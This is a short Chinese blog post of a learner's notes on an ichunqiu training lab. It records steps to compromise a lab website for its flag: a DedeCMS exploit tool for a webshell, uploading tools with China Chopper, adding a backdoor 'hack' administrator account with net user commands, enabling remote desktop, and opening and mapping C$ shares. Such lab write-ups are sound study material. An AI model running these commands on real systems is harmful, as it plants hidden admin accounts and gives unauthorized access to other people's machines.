美文网首页
ichunqiu《真的很简单》实验的几个坑点

ichunqiu《真的很简单》实验的几个坑点

作者: Ign0re | 来源:发表于2016-10-05 23:23 被阅读0次

    用了一下午 做了下这个实验

    各种百度无果 作为一枚资深菜鸟 觉得没有一个完整的教程是活不下去的好嘛 .. 被整的死去活来QAQ.


    本次实验要求获取www.test.ichunqiu网站的FLAG信息


    第一个《我很简单》:参考 独狼的攻略

    1.getshell
    通过dedecms漏洞利用工具下载 ,链接 tools.ichunqiu.com
    之后去掉前3后1 去解md5

    • 2.菜刀上传 pr,cmd,net,net1

    • 3.net user hack 123 /add
      net localgroup administrators hack /add
      3389

    • 4.net user hack //验证是否成功加上

    • 5.in target host>>
      net share ipc$ //打开ipc共享
      net share c$=c: //打开c盘共享

    • 6.in loacl host>>
      net use h: \172.16.12.2\c$ "123" /user:"hack"

      net use 查看连接情况
      net share 查看建立的IPC的连接

    ps:时间太紧 明天开课了 作业还没写 先这样 ..

    相关文章

      网友评论

          本文标题:ichunqiu《真的很简单》实验的几个坑点

          本文链接:https://www.haomeiwen.com/subject/qrasyttx.html